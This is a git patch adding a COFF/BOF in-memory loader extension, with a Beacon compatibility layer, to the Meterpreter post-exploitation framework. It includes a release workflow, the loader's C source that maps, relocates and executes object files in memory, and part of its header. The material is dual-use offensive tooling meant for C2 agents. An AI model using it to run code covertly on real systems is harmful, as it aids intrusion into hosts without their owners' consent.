From 327125a3a47c0eeca7d9ee604d65d9ade7e3a903 Mon Sep 17 00:00:00 2001 From: Kevin Clark Date: Sat, 20 Aug 2022 13:56:55 -0700 Subject: [PATCH 01/17] add bofloader folder --- .../.github/workflows/autorelease.yml | 61 ++ .../bofloader/COFFLoader/.gitignore | 4 + .../bofloader/COFFLoader/COFFLoader.c | 613 ++++++++++++++++++ .../bofloader/COFFLoader/COFFLoader.h | 135 ++++ .../bofloader/COFFLoader/LICENSE.txt | 25 + .../extensions/bofloader/COFFLoader/Makefile | 36 + .../extensions/bofloader/COFFLoader/README.md | 47 ++ .../extensions/bofloader/COFFLoader/beacon.h | 61 ++ .../COFFLoader/beacon_compatibility.c | 351 ++++++++++ .../COFFLoader/beacon_compatibility.h | 66 ++ .../bofloader/COFFLoader/beacon_generate.py | 96 +++ .../extensions/bofloader/COFFLoader/dll.c | 30 + .../bofloader/COFFLoader/extension.json | 22 + .../extensions/bofloader/COFFLoader/test.c | 44 ++ .../source/extensions/bofloader/main.c | 122 ++++ .../source/extensions/bofloader/main.h | 15 + 16 files changed, 1728 insertions(+) create mode 100644 c/meterpreter/source/extensions/bofloader/COFFLoader/.github/workflows/autorelease.yml create mode 100644 c/meterpreter/source/extensions/bofloader/COFFLoader/.gitignore create mode 100644 c/meterpreter/source/extensions/bofloader/COFFLoader/COFFLoader.c create mode 100644 c/meterpreter/source/extensions/bofloader/COFFLoader/COFFLoader.h create mode 100644 c/meterpreter/source/extensions/bofloader/COFFLoader/LICENSE.txt create mode 100644 c/meterpreter/source/extensions/bofloader/COFFLoader/Makefile create mode 100644 c/meterpreter/source/extensions/bofloader/COFFLoader/README.md create mode 100644 c/meterpreter/source/extensions/bofloader/COFFLoader/beacon.h create mode 100644 c/meterpreter/source/extensions/bofloader/COFFLoader/beacon_compatibility.c create mode 100644 c/meterpreter/source/extensions/bofloader/COFFLoader/beacon_compatibility.h create mode 100644 c/meterpreter/source/extensions/bofloader/COFFLoader/beacon_generate.py create mode 100644 c/meterpreter/source/extensions/bofloader/COFFLoader/dll.c create mode 100644 c/meterpreter/source/extensions/bofloader/COFFLoader/extension.json create mode 100644 c/meterpreter/source/extensions/bofloader/COFFLoader/test.c create mode 100644 c/meterpreter/source/extensions/bofloader/main.c create mode 100644 c/meterpreter/source/extensions/bofloader/main.h diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader/.github/workflows/autorelease.yml b/c/meterpreter/source/extensions/bofloader/COFFLoader/.github/workflows/autorelease.yml new file mode 100644 index 00000000..86ab034f --- /dev/null +++ b/c/meterpreter/source/extensions/bofloader/COFFLoader/.github/workflows/autorelease.yml @@ -0,0 +1,61 @@ +name: Release + +on: + push: + tags: ["v[1-9]+.[0-9]+.[0-9]+"] + branches: [main] + +jobs: + dll-build: + name: Build the DLL + if: startsWith( github.ref, 'refs/tags/v') + runs-on: ubuntu-latest + timeout-minutes: 10 + steps: + - name: OS Packages + run: | + sudo apt-get update --fix-missing && sudo apt-get -y install \ + git build-essential zlib1g zlib1g-dev wget zip unzip \ + mingw-w64 binutils-mingw-w64 g++-mingw-w64 gcc-multilib jq + + - name: Minisign + run: | + MINISIGN_TMP=`mktemp -d` + cd $MINISIGN_TMP + wget https://github.com/aead/minisign/releases/download/v0.2.0/minisign-linux-amd64.tar.gz + tar xvf minisign-linux-amd64.tar.gz + mv ./minisign ~/minisign + + - name: Check out code + uses: actions/checkout@v2 + + - name: Git Fetch Tags + run: git fetch --prune --unshallow --tags -f + + - name: Build artifacts + run: | + make clean + make all-dll + mkdir artifacts + VERSION=$(git describe --tags --abbrev=0) + cat extension.json | jq ".version |= \"$VERSION\"" > ./artifacts/extension.json + cp LICENSE.txt ./artifacts/LICENSE + mv *.dll ./artifacts/ + cd artifacts + tar -czvf ../coff-loader.tar.gz . + + - name: Sign Package + run: | + touch ~/minisign.key && chmod 600 ~/minisign.key + echo -e "${{ secrets.MINISIGN_PRIVATE_KEY }}" > ~/minisign.key + MANIFEST=$(cat ./artifacts/extension.json | base64 -w 0) + bash -c "echo \"\" | ~/minisign -s ~/minisign.key -S -m ./coff-loader.tar.gz -t \"$MANIFEST\" -x coff-loader.minisig" + + - name: "Publish Release" + uses: "marvinpinto/action-automatic-releases@latest" + with: + repo_token: "${{ secrets.GITHUB_TOKEN }}" + prerelease: false + files: | + ./coff-loader.tar.gz + ./coff-loader.minisig diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader/.gitignore b/c/meterpreter/source/extensions/bofloader/COFFLoader/.gitignore new file mode 100644 index 00000000..3c3c7474 --- /dev/null +++ b/c/meterpreter/source/extensions/bofloader/COFFLoader/.gitignore @@ -0,0 +1,4 @@ +*.exe +*.out +*.dll +.vscode \ No newline at end of file diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader/COFFLoader.c b/c/meterpreter/source/extensions/bofloader/COFFLoader/COFFLoader.c new file mode 100644 index 00000000..5a7e6703 --- /dev/null +++ b/c/meterpreter/source/extensions/bofloader/COFFLoader/COFFLoader.c @@ -0,0 +1,613 @@ +/* + * COFF Loader Project + * ------------------- + * This is a re-implementation of a COFF loader, with a BOF compatibility layer + * it's meant to provide functional example of loading a COFF file in memory + * and maybe be useful. + */ +#include +#include +#include +#include + +#if defined(_WIN32) +#include +#include "beacon_compatibility.h" +#endif + +#include "COFFLoader.h" + +/* Enable or disable debug output if testing or adding new relocation types */ +#ifdef DEBUG +#define DEBUG_PRINT(x, ...) printf(x, ##__VA_ARGS__) +#else +#define DEBUG_PRINT(x, ...) +#endif + +/* Defining symbols for the OS version, will try to define anything that is + * different between the arch versions by specifying them here. */ +#if defined(__x86_64__) || defined(_WIN64) +#define PREPENDSYMBOLVALUE "__imp_" +#else +#define PREPENDSYMBOLVALUE "__imp__" +#endif + +unsigned char *unhexlify(unsigned char *value, int *outlen) +{ + unsigned char *retval = NULL; + char byteval[3] = {0}; + int counter = 0; + int counter2 = 0; + char character = 0; + if (value == NULL) + { + return NULL; + } + DEBUG_PRINT("Unhexlify Strlen: %lu\n", (long unsigned int)strlen((char *)value)); + if (value == NULL || strlen((char *)value) % 2 != 0) + { + DEBUG_PRINT("Either value is NULL, or the hexlified string isn't valid\n"); + goto errcase; + } + + retval = calloc(strlen((char *)value) + 1, 1); + if (retval == NULL) + { + goto errcase; + } + + counter2 = 0; + for (counter = 0; counter < strlen((char *)value); counter += 2) + { + memcpy(byteval, value + counter, 2); + character = strtol(byteval, NULL, 16); + memcpy(retval + counter2, &character, 1); + counter2++; + } + *outlen = counter2; + +errcase: + return retval; +} + +/* Helper to just get the contents of a file, used for testing. Real + * implementations of this in an agent would use the tasking from the + * C2 server for this */ +unsigned char *getContents(char *filepath, uint32_t *outsize) +{ + FILE *fin = NULL; + uint32_t fsize = 0; + uint32_t readsize = 0; + unsigned char *buffer = NULL; + unsigned char *tempbuffer = NULL; + + fin = fopen(filepath, "rb"); + if (fin == NULL) + { + return NULL; + } + fseek(fin, 0, SEEK_END); + fsize = ftell(fin); + fseek(fin, 0, SEEK_SET); + tempbuffer = calloc(fsize, 1); + if (tempbuffer == NULL) + { + return NULL; + } + memset(tempbuffer, 0, fsize); + readsize = fread(tempbuffer, 1, fsize, fin); + + fclose(fin); + buffer = calloc(readsize, 1); + if (buffer == NULL) + { + return NULL; + } + memset(buffer, 0, readsize); + memcpy(buffer, tempbuffer, readsize - 1); + free(tempbuffer); + *outsize = fsize; + return buffer; +} + +/* Helper function to process a symbol string, determine what function and + * library its from, and return the right function pointer. Will need to + * implement in the loading of the beacon internal functions, or any other + * internal functions you want to have available. */ +void *process_symbol(char *symbolstring) +{ + void *functionaddress = NULL; + char localcopy[1024] = {0}; + char *locallib = NULL; + char *localfunc = NULL; +#if defined(_WIN32) + int tempcounter = 0; + HMODULE llHandle = NULL; +#endif + + memcpy(localcopy, symbolstring, strlen(symbolstring)); + if (strncmp(symbolstring, PREPENDSYMBOLVALUE "Beacon", strlen(PREPENDSYMBOLVALUE "Beacon")) == 0 || strncmp(symbolstring, PREPENDSYMBOLVALUE "toWideChar", strlen(PREPENDSYMBOLVALUE "toWideChar")) == 0 || + strncmp(symbolstring, PREPENDSYMBOLVALUE "GetProcAddress", strlen(PREPENDSYMBOLVALUE "GetProcAddress")) == 0 || strncmp(symbolstring, PREPENDSYMBOLVALUE "LoadLibraryA", strlen(PREPENDSYMBOLVALUE "LoadLibraryA")) == 0 || + strncmp(symbolstring, PREPENDSYMBOLVALUE "GetModuleHandleA", strlen(PREPENDSYMBOLVALUE "GetModuleHandleA")) == 0 || strncmp(symbolstring, PREPENDSYMBOLVALUE "FreeLibrary", strlen(PREPENDSYMBOLVALUE "FreeLibrary")) == 0) + { + localfunc = symbolstring + strlen(PREPENDSYMBOLVALUE); + DEBUG_PRINT("\t\tInternalFunction: %s\n", localfunc); + /* TODO: Get internal symbol here and set to functionaddress, then + * return the pointer to the internal function*/ +#if defined(_WIN32) + for (tempcounter = 0; tempcounter < 29; tempcounter++) + { + if (InternalFunctions[tempcounter][0] != NULL) + { + if (strcmp(localfunc, (char *)(InternalFunctions[tempcounter][0])) == 0) + { + functionaddress = (void *)InternalFunctions[tempcounter][1]; + return functionaddress; + } + } + } +#endif + } + else if (strncmp(symbolstring, PREPENDSYMBOLVALUE, strlen(PREPENDSYMBOLVALUE)) == 0) + { + DEBUG_PRINT("\t\tYep its an external symbol\n"); + locallib = localcopy + strlen(PREPENDSYMBOLVALUE); + + locallib = strtok(locallib, "$"); + localfunc = strtok(NULL, "$"); + DEBUG_PRINT("\t\tLibrary: %s\n", locallib); + localfunc = strtok(localfunc, "@"); + DEBUG_PRINT("\t\tFunction: %s\n", localfunc); + /* Resolve the symbols here, and set the functionpointervalue */ +#if defined(_WIN32) + llHandle = LoadLibraryA(locallib); + DEBUG_PRINT("\t\tHandle: 0x%lx\n", llHandle); + functionaddress = GetProcAddress(llHandle, localfunc); + DEBUG_PRINT("\t\tProcAddress: 0x%p\n", functionaddress); +#endif + } + return functionaddress; +} + +int LoadAndRun(char *argsBuffer, uint32_t bufferSize, goCallback callback) +{ +#if defined(_WIN32) + // argsBuffer: functionname |coff_data | args_data + datap parser; + char *functionName; + unsigned char *coff_data = NULL; + unsigned char *arguments_data = NULL; + int filesize = 0; + int arguments_size = 0; + + BeaconDataParse(&parser, argsBuffer, bufferSize); + functionName = BeaconDataExtract(&parser, NULL); + if (functionName == NULL) + { + return 1; + } + coff_data = (unsigned char *)BeaconDataExtract(&parser, &filesize); + if (coff_data == NULL) + { + return 1; + } + arguments_data = (unsigned char *)BeaconDataExtract(&parser, &arguments_size); + if (arguments_data == NULL) + { + return 1; + } + + return RunCOFF(functionName, coff_data, filesize, arguments_data, arguments_size, callback); +#else + return 0; +#endif +} +// #endif +/* Just a generic runner for testing, this is pretty much just a reference + * implementation, return values will need to be checked, more relocation + * types need to be handled, and needs to have different arguments for use + * in any agent. */ +int RunCOFF(char *functionname, unsigned char *coff_data, uint32_t filesize, unsigned char *argumentdata, int argumentSize, goCallback callback) +{ + coff_file_header_t *coff_header_ptr = NULL; + coff_sect_t *coff_sect_ptr = NULL; + coff_reloc_t *coff_reloc_ptr = NULL; + coff_sym_t *coff_sym_ptr = NULL; + char *outdata = NULL; + int outdataSize = 0; + int retcode = 0; + int counter = 0; + int reloccount = 0; + int tempcounter = 0; + uint32_t symptr = 0; + long unsigned int old_prot = 0; + uint32_t protect = 0; + uint32_t protect_index = 0; +#ifdef _WIN32 + void *funcptrlocation = NULL; + int32_t offsetvalue = 0; +#endif + char *entryfuncname = functionname; +#if defined(__x86_64__) || defined(_WIN64) +#ifdef _WIN32 + uint64_t longoffsetvalue = 0; +#endif +#else + /* Set the input function name to match the 32 bit version */ + entryfuncname = calloc(strlen(functionname) + 2, 1); + if (entryfuncname == NULL) + { + return 1; + } + (void)sprintf(entryfuncname, "_%s", functionname); +#endif + +#ifdef _WIN32 + /* NOTE: I just picked a size, look to see what is max/normal. */ + char *sectionMapping[25] = {0}; +#ifdef DEBUG + int sectionSize[25] = {0}; +#endif + void (*foo)(char *in, unsigned long datalen); + char *functionMapping = NULL; + int functionMappingCount = 0; +#endif + + if (coff_data == NULL) + { + DEBUG_PRINT("Can't execute NULL\n"); + return 1; + } + coff_header_ptr = (coff_file_header_t *)coff_data; + DEBUG_PRINT("Machine 0x%X\n", coff_header_ptr->Machine); + DEBUG_PRINT("Number of sections: %d\n", coff_header_ptr->NumberOfSections); + DEBUG_PRINT("TimeDateStamp : %X\n", coff_header_ptr->TimeDateStamp); + DEBUG_PRINT("PointerToSymbolTable : 0x%X\n", coff_header_ptr->PointerToSymbolTable); + DEBUG_PRINT("NumberOfSymbols: %d\n", coff_header_ptr->NumberOfSymbols); + DEBUG_PRINT("OptionalHeaderSize: %d\n", coff_header_ptr->SizeOfOptionalHeader); + DEBUG_PRINT("Characteristics: %d\n", coff_header_ptr->Characteristics); + DEBUG_PRINT("\n"); + coff_sym_ptr = (coff_sym_t *)(coff_data + coff_header_ptr->PointerToSymbolTable); + + /* Handle the allocation and copying of the sections we're going to use + * for right now I'm just VirtualAlloc'ing memory, this can be changed to + * other methods, but leaving that up to the person implementing it. */ + for (counter = 0; counter < coff_header_ptr->NumberOfSections; counter++) + { + coff_sect_ptr = (coff_sect_t *)(coff_data + sizeof(coff_file_header_t) + (sizeof(coff_sect_t) * counter)); + DEBUG_PRINT("Name: %s\n", coff_sect_ptr->Name); + DEBUG_PRINT("VirtualSize: 0x%X\n", coff_sect_ptr->VirtualSize); + DEBUG_PRINT("VirtualAddress: 0x%X\n", coff_sect_ptr->VirtualAddress); + DEBUG_PRINT("SizeOfRawData: 0x%X\n", coff_sect_ptr->SizeOfRawData); + DEBUG_PRINT("PointerToRelocations: 0x%X\n", coff_sect_ptr->PointerToRelocations); + DEBUG_PRINT("PointerToRawData: 0x%X\n", coff_sect_ptr->PointerToRawData); + DEBUG_PRINT("NumberOfRelocations: %d\n", coff_sect_ptr->NumberOfRelocations); + /* NOTE: When changing the memory loading information of the loader, + * you'll want to use this field and the defines from the Section + * Flags table of Microsofts page, some defined in COFFLoader.h */ + DEBUG_PRINT("Characteristics: %x\n", coff_sect_ptr->Characteristics); +#ifdef _WIN32 + DEBUG_PRINT("Allocating 0x%x bytes\n", coff_sect_ptr->VirtualSize); + /* NOTE: Might want to allocate as PAGE_READWRITE and VirtualProtect + * before execution to either PAGE_READWRITE or PAGE_EXECUTE_READ + * depending on the Section Characteristics. Parse them all again + * before running and set the memory permissions. */ + sectionMapping[counter] = VirtualAlloc(NULL, coff_sect_ptr->SizeOfRawData, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_READWRITE); +#ifdef DEBUG + sectionSize[counter] = coff_sect_ptr->SizeOfRawData; +#endif + if (sectionMapping[counter] == NULL) + { + DEBUG_PRINT("Failed to allocate memory\n"); + } + DEBUG_PRINT("Allocated section %d at %p\n", counter, sectionMapping[counter]); + memcpy(sectionMapping[counter], coff_data + coff_sect_ptr->PointerToRawData, coff_sect_ptr->SizeOfRawData); + +#endif + } + + /* Allocate and setup the GOT for functions, same here as above. */ +#ifdef _WIN32 +#ifdef _WIN64 + functionMapping = VirtualAlloc(NULL, 2048, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_READWRITE); +#else + functionMapping = VirtualAlloc(NULL, 2048, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_READWRITE); +#endif +#endif + + /* Start parsing the relocations, and *hopefully* handle them correctly. */ + for (counter = 0; counter < coff_header_ptr->NumberOfSections; counter++) + { + DEBUG_PRINT("Doing Relocations of section: %d\n", counter); + coff_sect_ptr = (coff_sect_t *)(coff_data + sizeof(coff_file_header_t) + (sizeof(coff_sect_t) * counter)); + coff_reloc_ptr = (coff_reloc_t *)(coff_data + coff_sect_ptr->PointerToRelocations); + for (reloccount = 0; reloccount < coff_sect_ptr->NumberOfRelocations; reloccount++) + { + DEBUG_PRINT("\tVirtualAddress: 0x%X\n", coff_reloc_ptr->VirtualAddress); + DEBUG_PRINT("\tSymbolTableIndex: 0x%X\n", coff_reloc_ptr->SymbolTableIndex); + DEBUG_PRINT("\tType: 0x%X\n", coff_reloc_ptr->Type); + if (coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].first.Name[0] != 0) + { + symptr = coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].first.value[1]; + DEBUG_PRINT("\tSymPtr: 0x%X\n", symptr); + DEBUG_PRINT("\tSymName: %s\n", coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].first.Name); + DEBUG_PRINT("\tSectionNumber: 0x%X\n", coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].SectionNumber); + + /* This is the code for relative offsets in other sections of the COFF file. */ +#ifdef _WIN32 +#ifdef _WIN64 + /* Type == 1 relocation is the 64-bit VA of the relocation target */ + if (coff_reloc_ptr->Type == IMAGE_REL_AMD64_ADDR64) + { + memcpy(&longoffsetvalue, sectionMapping[counter] + coff_reloc_ptr->VirtualAddress, sizeof(uint64_t)); + DEBUG_PRINT("\tReadin longOffsetValue : 0x%llX\n", longoffsetvalue); + longoffsetvalue = (uint64_t)(sectionMapping[coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].SectionNumber - 1] + (uint64_t)longoffsetvalue); + DEBUG_PRINT("\tModified longOffsetValue : 0x%llX Base Address: %p\n", longoffsetvalue, sectionMapping[coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].SectionNumber - 1]); + memcpy(sectionMapping[counter] + coff_reloc_ptr->VirtualAddress, &longoffsetvalue, sizeof(uint64_t)); + } + /* This is Type == 3 relocation code */ + else if (coff_reloc_ptr->Type == IMAGE_REL_AMD64_ADDR32NB) + { + memcpy(&offsetvalue, sectionMapping[counter] + coff_reloc_ptr->VirtualAddress, sizeof(int32_t)); + DEBUG_PRINT("\tReadin OffsetValue : 0x%0X\n", offsetvalue); + DEBUG_PRINT("\t\tReferenced Section: 0x%X\n", sectionMapping[coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].SectionNumber - 1] + offsetvalue); + DEBUG_PRINT("\t\tEnd of Relocation Bytes: 0x%X\n", sectionMapping[counter] + coff_reloc_ptr->VirtualAddress + 4); + if (((char *)(sectionMapping[coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].SectionNumber - 1] + offsetvalue) - (char *)(sectionMapping[counter] + coff_reloc_ptr->VirtualAddress + 4)) > 0xffffffff) + { + DEBUG_PRINT("Relocations > 4 gigs away, exiting\n"); + retcode = 1; + goto cleanup; + } + offsetvalue = ((char *)(sectionMapping[coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].SectionNumber - 1] + offsetvalue) - (char *)(sectionMapping[counter] + coff_reloc_ptr->VirtualAddress + 4)); + DEBUG_PRINT("\tOffsetValue : 0x%0X\n", offsetvalue); + DEBUG_PRINT("\t\tSetting 0x%X to %X\n", sectionMapping[counter] + coff_reloc_ptr->VirtualAddress, &offsetvalue); + memcpy(sectionMapping[counter] + coff_reloc_ptr->VirtualAddress, &offsetvalue, sizeof(uint32_t)); + } + /* This is Type == 4 relocation code, needed to make global variables to work correctly */ + else if (coff_reloc_ptr->Type == IMAGE_REL_AMD64_REL32) + { + memcpy(&offsetvalue, sectionMapping[counter] + coff_reloc_ptr->VirtualAddress, sizeof(int32_t)); + DEBUG_PRINT("\t\tReadin offset value: 0x%X\n", offsetvalue); + if ((sectionMapping[coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].SectionNumber - 1] - (sectionMapping[counter] + coff_reloc_ptr->VirtualAddress + 4)) > 0xffffffff) + { + DEBUG_PRINT("Relocations > 4 gigs away, exiting\n"); + retcode = 1; + goto cleanup; + } + offsetvalue += (sectionMapping[coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].SectionNumber - 1] - (sectionMapping[counter] + coff_reloc_ptr->VirtualAddress + 4)); + DEBUG_PRINT("\t\tRelative address: 0x%X\n", offsetvalue); + memcpy(sectionMapping[counter] + coff_reloc_ptr->VirtualAddress, &offsetvalue, sizeof(uint32_t)); + } + else + { + DEBUG_PRINT("No code for relocation type: %d\n", coff_reloc_ptr->Type); + } +#else + /* This is Type == IMAGE_REL_I386_DIR32 relocation code */ + memcpy(&offsetvalue, sectionMapping[counter] + coff_reloc_ptr->VirtualAddress, sizeof(int32_t)); + DEBUG_PRINT("\tReadin OffsetValue : 0x%0X\n", offsetvalue); + offsetvalue = (uint32_t)(sectionMapping[coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].SectionNumber - 1]) + offsetvalue; + memcpy(sectionMapping[counter] + coff_reloc_ptr->VirtualAddress, &offsetvalue, sizeof(uint32_t)); +#endif // WIN64 statement close +#endif // WIN32 statement close + } + else + { + symptr = coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].first.value[1]; + DEBUG_PRINT("\tSymPtr: 0x%X\n", symptr); + DEBUG_PRINT("\tSymVal: %s\n", ((char *)(coff_sym_ptr + coff_header_ptr->NumberOfSymbols)) + symptr); + DEBUG_PRINT("\tSectionNumber: 0x%X\n", coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].SectionNumber); + + /* This is the code to handle functions themselves, so using a makeshift Global Offset Table for it */ +#ifdef _WIN32 + funcptrlocation = process_symbol(((char *)(coff_sym_ptr + coff_header_ptr->NumberOfSymbols)) + symptr); + if (funcptrlocation == NULL) + { + DEBUG_PRINT("Failed to resolve symbol\n"); + retcode = 1; + goto cleanup; + } +#ifdef _WIN64 + if (coff_reloc_ptr->Type == IMAGE_REL_AMD64_REL32 && funcptrlocation != NULL) + { + /* This is Type == 4 relocation code */ + DEBUG_PRINT("Doing function relocation\n"); + if (((functionMapping + (functionMappingCount * 8)) - (sectionMapping[counter] + coff_reloc_ptr->VirtualAddress + 4)) > 0xffffffff) + { + DEBUG_PRINT("Relocations > 4 gigs away, exiting\n"); + retcode = 1; + goto cleanup; + } + memcpy(functionMapping + (functionMappingCount * 8), &funcptrlocation, sizeof(uint64_t)); + offsetvalue = (int32_t)((functionMapping + (functionMappingCount * 8)) - (sectionMapping[counter] + coff_reloc_ptr->VirtualAddress + 4)); + DEBUG_PRINT("\t\tRelative address : 0x%x\n", offsetvalue); + memcpy(sectionMapping[counter] + coff_reloc_ptr->VirtualAddress, &offsetvalue, sizeof(uint32_t)); + functionMappingCount++; + } + else if (coff_reloc_ptr->Type == IMAGE_REL_AMD64_REL32) + { + /* This shouldn't be needed here, but incase there's a defined symbol + * that somehow doesn't have a function, try to resolve it here.*/ + memcpy(&offsetvalue, sectionMapping[counter] + coff_reloc_ptr->VirtualAddress, sizeof(int32_t)); + if ((sectionMapping[coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].SectionNumber - 1] - (sectionMapping[counter] + coff_reloc_ptr->VirtualAddress + 4)) > 0xffffffff) + { + DEBUG_PRINT("Relocations > 4 gigs away, exiting\n"); + retcode = 1; + goto cleanup; + } + DEBUG_PRINT("\t\tReadin offset value: 0x%X\n", offsetvalue); + offsetvalue += (sectionMapping[coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].SectionNumber - 1] - (sectionMapping[counter] + coff_reloc_ptr->VirtualAddress + 4)); + DEBUG_PRINT("\t\tRelative address: 0x%X\n", offsetvalue); + memcpy(sectionMapping[counter] + coff_reloc_ptr->VirtualAddress, &offsetvalue, sizeof(uint32_t)); + } + else + { + DEBUG_PRINT("No code for relocation type: %d\n", coff_reloc_ptr->Type); + } +#else + /* This is Type == IMAGE_REL_I386_DIR32 relocation code */ + memcpy(functionMapping + (functionMappingCount * 4), &funcptrlocation, sizeof(uint32_t)); + offsetvalue = (int32_t)(functionMapping + (functionMappingCount * 4)); + memcpy(sectionMapping[counter] + coff_reloc_ptr->VirtualAddress, &offsetvalue, sizeof(uint32_t)); + functionMappingCount++; +#endif +#endif + } + DEBUG_PRINT("\tValueNumber: 0x%X\n", coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].Value); + DEBUG_PRINT("\tSectionNumber: 0x%X\n", coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].SectionNumber); + coff_reloc_ptr = (coff_reloc_t *)(((char *)coff_reloc_ptr) + sizeof(coff_reloc_t)); + DEBUG_PRINT("\n"); + } + DEBUG_PRINT("\n"); + } + + /* Some debugging code to see what the sections look like in memory */ +#if DEBUG +#ifdef _WIN32 + for (tempcounter = 0; tempcounter < 10; tempcounter++) + { + DEBUG_PRINT("Section: %d\n", tempcounter); + if (sectionMapping[tempcounter] != NULL) + { + DEBUG_PRINT("\t"); + for (counter = 0; counter < sectionSize[tempcounter]; counter++) + { + DEBUG_PRINT("%02X ", (uint8_t)(sectionMapping[tempcounter][counter])); + } + DEBUG_PRINT("\n"); + } + } +#endif +#endif + // Apply proper page permissions + for (counter = 0; counter < coff_header_ptr->NumberOfSections; counter++) + { + coff_sect_ptr = (coff_sect_t *)(coff_data + sizeof(coff_file_header_t) + (sizeof(coff_sect_t) * counter)); + if (coff_sect_ptr->SizeOfRawData > 0) + { + protect_index = coff_sect_ptr->Characteristics >> 29; + protect = ProtectionFlags[protect_index]; + DEBUG_PRINT("New page prot flag: 0x%08x\n", protect); + if ((coff_sect_ptr->Characteristics & IMAGE_SCN_MEM_NOT_CACHED) != 0) + { + protect |= PAGE_NOCACHE; + } + if (VirtualProtect(sectionMapping[counter], coff_sect_ptr->SizeOfRawData, protect, &old_prot) == 0) + { +#if DEBUG + DWORD error = GetLastError(); + DEBUG_PRINT("Could not change page protection: %08x\n", error); +#endif + return 1; + } + } + } + + if (VirtualProtect(functionMapping, 2048, PAGE_EXECUTE_READ, &old_prot) == 0) + { +#if DEBUG + DWORD error = GetLastError(); + DEBUG_PRINT("Could not change page protection on functionMapping: %08x\n", error); +#endif + return 1; + } + + DEBUG_PRINT("Symbols:\n"); + for (tempcounter = 0; tempcounter < coff_header_ptr->NumberOfSymbols; tempcounter++) + { + DEBUG_PRINT("\t%s: Section: %d, Value: 0x%X\n", coff_sym_ptr[tempcounter].first.Name, coff_sym_ptr[tempcounter].SectionNumber, coff_sym_ptr[tempcounter].Value); + if (strcmp(coff_sym_ptr[tempcounter].first.Name, entryfuncname) == 0) + { + DEBUG_PRINT("\t\tFound entry!\n"); +#ifdef _WIN32 + /* So for some reason VS 2017 doesn't like this, but char* casting works, so just going to do that */ +#ifdef _MSC_VER + foo = (char *)(sectionMapping[coff_sym_ptr[tempcounter].SectionNumber - 1] + coff_sym_ptr[tempcounter].Value); +#else + foo = (void (*)(char *, unsigned long))(sectionMapping[coff_sym_ptr[tempcounter].SectionNumber - 1] + coff_sym_ptr[tempcounter].Value); +#endif + // sectionMapping[coff_sym_ptr[tempcounter].SectionNumber-1][coff_sym_ptr[tempcounter].Value+7] = '\xcc'; + DEBUG_PRINT("Trying to run: %p\n", foo); + foo((char *)argumentdata, argumentSize); +#endif + } + } + DEBUG_PRINT("Back\n"); + + /* Cleanup the allocated memory */ +#ifdef _WIN32 + if (callback != NULL) + { + outdata = BeaconGetOutputData(&outdataSize); + if (outdata != NULL) + { + DEBUG_PRINT("[COFFLoader] Calling Go callback at %p\n", callback); + (*callback)(outdata, outdataSize); + } + } +cleanup: + for (tempcounter = 0; tempcounter < 25; tempcounter++) + { + if (sectionMapping[tempcounter]) + { + VirtualFree(sectionMapping[tempcounter], 0, MEM_RELEASE); + } + } + VirtualFree(functionMapping, 0, MEM_RELEASE); +#endif + DEBUG_PRINT("Returning\n"); + return retcode; +} + +#ifdef COFF_STANDALONE +int main(int argc, char *argv[]) +{ + char *coff_data = NULL; + unsigned char *arguments = NULL; + int argumentSize = 0; +#ifdef _WIN32 + char *outdata = NULL; + int outdataSize = 0; +#endif + uint32_t filesize = 0; + int checkcode = 0; + if (argc < 3) + { + printf("ERROR: %s go /path/to/object/file.o (arguments)\n", argv[0]); + return 1; + } + + coff_data = (char *)getContents(argv[2], &filesize); + if (coff_data == NULL) + { + printf("ERROR: empty bof file\n"); + return 1; + } + printf("Got contents of COFF file\n"); + arguments = unhexlify((unsigned char *)argv[3], &argumentSize); + printf("Running/Parsing the COFF file\n"); + checkcode = RunCOFF(argv[1], (unsigned char *)coff_data, filesize, arguments, argumentSize, NULL); + if (checkcode == 0) + { +#ifdef _WIN32 + printf("Ran/parsed the coff\n"); + outdata = BeaconGetOutputData(&outdataSize); + if (outdata != NULL) + { + + printf("Outdata Below:\n\n%s\n", outdata); + } +#endif + } + else + { + printf("Failed to run/parse the COFF file\n"); + } + if (coff_data) + { + free(coff_data); + } + return 0; +} + +#endif diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader/COFFLoader.h b/c/meterpreter/source/extensions/bofloader/COFFLoader/COFFLoader.h new file mode 100644 index 00000000..3deb8240 --- /dev/null +++ b/c/meterpreter/source/extensions/bofloader/COFFLoader/COFFLoader.h @@ -0,0 +1,135 @@ +#ifndef COFFLOADER_H_ +#define COFFLOADER_H_ +#include +#include +#include + +/* These seem to be the same sizes across architectures, relocations are different though. Defined both sets of types. */ + +/* sizeof 20 */ +typedef struct coff_file_header +{ + uint16_t Machine; + uint16_t NumberOfSections; + uint32_t TimeDateStamp; + uint32_t PointerToSymbolTable; + uint32_t NumberOfSymbols; + uint16_t SizeOfOptionalHeader; + uint16_t Characteristics; +} coff_file_header_t; + +/* AMD64 should always be here */ +#define MACHINETYPE_AMD64 0x8664 + +#pragma pack(push, 1) + +/* Size of 40 */ +typedef struct coff_sect +{ + char Name[8]; + uint32_t VirtualSize; + uint32_t VirtualAddress; + uint32_t SizeOfRawData; + uint32_t PointerToRawData; + uint32_t PointerToRelocations; + uint32_t PointerToLineNumbers; + uint16_t NumberOfRelocations; + uint16_t NumberOfLinenumbers; + uint32_t Characteristics; +} coff_sect_t; 